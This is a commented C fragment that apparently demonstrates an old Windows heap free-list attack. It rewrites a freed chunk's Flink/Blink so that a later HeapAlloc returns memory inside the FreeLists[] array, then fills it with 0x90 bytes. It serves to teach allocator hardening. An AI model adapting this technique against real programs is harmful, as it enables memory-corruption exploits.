/*
 * Demonstration fragment: shows, on the heap referenced by pHeap, how the
 * FreeLists[] heads react when the Flink/Blink fields of a freed chunk are
 * rewritten before the chunk is allocated again. Every stage prints the two
 * list heads involved so the change in heap metadata can be followed.
 *
 * p, pHeap, HEAP_ENTRY, HEAP_FREE_ENTRY, FillLookasideList() and
 * EmptyLookasideList() are declared outside this excerpt.
 *
 * NOTE(review): which link validation the targeted heap implementation
 * performs is not visible here. Treat this as an illustration of why
 * allocators must protect free-chunk metadata, and confirm the OS/heap
 * version it was written for before drawing conclusions about current systems.
 */

/* Requested user size, and the two FreeLists[] slots that are printed.
 * INDEX_A is ALLOC_SIZE/8 and INDEX_B is the next slot; the printf labels
 * call them "n-1" and "n".
 * presumably the freed chunk lands in slot n because its header adds one
 * more 8-byte unit - confirm against the HEAP_ENTRY definition. */
#define ALLOC_SIZE 64
#define INDEX_A (ALLOC_SIZE>>3)
#define INDEX_B ((ALLOC_SIZE>>3)+1)

/* View of the chunk as a free-list entry, header included. */
HEAP_FREE_ENTRY *chunk;

/* NOTE(review): assert() is compiled out under NDEBUG, so a failed
 * allocation would go unchecked in such a build. */
p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
/* Step back from the user pointer to the chunk header.
 * assumes p is a byte pointer so the subtraction moves exactly
 * sizeof(HEAP_ENTRY) bytes - p's declaration is not shown, confirm. */
chunk = (HEAP_FREE_ENTRY *)(p - sizeof(HEAP_ENTRY));
/* presumably the lookaside list is filled so that the HeapFree() below puts
 * the chunk on FreeLists[] rather than on the lookaside, and emptied again so
 * later allocations are served from FreeLists[] - helpers are defined
 * elsewhere, verify. */
FillLookasideList(pHeap, ALLOC_SIZE);
HeapFree(pHeap, 0, p);
EmptyLookasideList(pHeap, ALLOC_SIZE);

/* Baseline: list heads and the freed chunk's links before any tampering.
 * NOTE(review): %08lx is given what appear to be pointer arguments; that only
 * matches where pointers and unsigned long are both 32 bits wide. Applies to
 * every printf in this fragment. */
printf("before overwrite:\n");
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);
printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);

/* The freed chunk's links are rewritten directly; both new values are
 * addresses of Blink fields inside the heap's own FreeLists[] array.
 * presumably this stands in for a memory-corruption bug that reaches a free
 * chunk's metadata - the program writes the fields itself here. */
chunk->FreeList.Flink = (LIST_ENTRY *)(&pHeap->FreeLists[INDEX_A].Blink);
chunk->FreeList.Blink = (LIST_ENTRY *)(&pHeap->FreeLists[INDEX_B].Blink);
printf("\nafter overwrite:\n");
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);
printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);

/* First allocation of the same size after the overwrite; the list heads are
 * printed again so any change caused by removing the chunk from its list is
 * visible. presumably this call returns the chunk freed above - compare the
 * printed address. */
p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
printf("\nafter 1st alloc (returned 0x%08lx):\n", p);
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);

/* Second allocation: compare the returned address with the FreeLists[]
 * addresses printed above. If it lies inside that array, the memset() below
 * writes over heap management data instead of user memory, which is the
 * integrity failure this fragment illustrates. */
p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
printf("\nafter 2nd alloc (returned 0x%08lx):\n", p);
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);
/* NOTE(review): the message shows nine 0x90 bytes but memset() writes 12;
 * one of the two is out of date - confirm which length is intended. */
printf("Copying 0x909090909090909090 into new chunk\n");
memset(p, 0x90, 12);
/* Final dump: shows whether the 0x90 fill landed in the list heads. */
printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_A], pHeap->FreeLists[INDEX_A].Flink, pHeap->FreeLists[INDEX_A].Blink);
printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[INDEX_B], pHeap->FreeLists[INDEX_B].Flink, pHeap->FreeLists[INDEX_B].Blink);

